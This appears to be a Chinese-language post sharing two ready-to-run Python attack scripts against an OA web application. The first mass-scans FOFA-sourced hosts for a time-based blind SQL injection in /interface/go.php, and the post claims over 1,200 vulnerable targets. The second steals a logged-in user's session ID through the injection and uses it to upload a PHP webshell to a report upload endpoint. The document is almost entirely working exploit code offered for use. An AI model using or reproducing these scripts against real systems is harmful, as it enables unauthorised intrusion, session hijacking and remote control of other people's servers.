|
目录
批量检测:
稍微改动下,getshell脚本:
python写的,fofa 4000目标检测出来1200+存在:
批量检测:
# -*- coding: utf-8 -*-
import requests,sys
import argparse
import urllib3
import ssl
import vthread
urllib3.disable_warnings()
ssl._create_default_https_context = ssl._create_unverified_context
headers = {
"Content-Type":"application/x-www-form-urlencoded"
}
session = ""
def isLogin(host):
try:
r = requests.get(url="{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if((select count(UID) from user_online)=0%252csleep(20)%252c1)+%23%25%252727".format(url=host),timeout = 10,headers=headers)
return True
except requests.exceptions.ReadTimeout:
return False
@vthread.pool(10)
def GetSession(url):
global session
if isLogin(url):
print("存在用户登录......")
with open('純在漏洞.txt',"a") as a: #设置文件对象
str = a.write(url + "\n")
else:
print("没有用户登录")
if __name__ == "__main__":
f = open(input())
lines = f.readlines()
for line in lines:
line = line.strip()
if "http" not in line:
line = "http://" + line
GetSession(line)
稍微改动下,getshell脚本:
# -*- coding: utf-8 -*-
import requests,sys
import argparse
import urllib3
import ssl
urllib3.disable_warnings()
ssl._create_default_https_context = ssl._create_unverified_context
headers = {
"Content-Type":"application/x-www-form-urlencoded"
}
session = ""
def isLogin(host):
try:
r = requests.get(url="{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if((select count(UID) from user_online)=0%252csleep(20)%252c1)+%23%25%252727".format(url=host),timeout = 10,headers=headers)
return True
except requests.exceptions.ReadTimeout:
return False
def GetSession(url):
global session
if isLogin(url):
print("存在用户登录......")
for i in range(27):
for x in range(48,128):
sql = "{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if(ascii(mid((select sid from user_online limit 0%252c1)%252c{mid}%252c1))={ascii}%252csleep(20)%252c1)+%23%25%252727".format(
url=url, mid=i, ascii=x)
try:
r = requests.get(url = sql,timeout=18,headers=headers)
except requests.exceptions.ReadTimeout:
print("编码:"+str(x))
print("sql:"+sql)
session += chr(x)
break
print("session:"+session)
print("--------------------------------------------------------")
print("OK:",session)
else:
print("没有用户登录")
def upload(url,file):
if len(session) < 20:
print("session不完整,请重新获取....")
return
with open(file,"rb") as file:
print("开始上传文件...")
file = [('FILE1',('shell.php. ',file,'image/png'))]
r = requests.post(url="{url}/general/reportshop/utils/upload.php?action=upload&filetype=xls".format(url=url),headers={"cookie":"PHPSESSID="+session},files=file)
if "true" in r.text:
print("上传成功,shell地址:8750端口 \\attachment\\reportshop\\templates\\shell.php")
else:
print(r.text)
if __name__ == "__main__":
Usage = 'python3 1.py -u url -f file'
parser = argparse.ArgumentParser(description = Usage)
parser.add_argument('-u', '--url', type=str, required=True, help='e.g. The website home page. 172.16.203.147')
parser.add_argument('-f', '--file', type=str, required=True, help='Path to ')
args = parser.parse_args()
url = args.url
file = args.file
GetSession(url)
upload(url,file)
|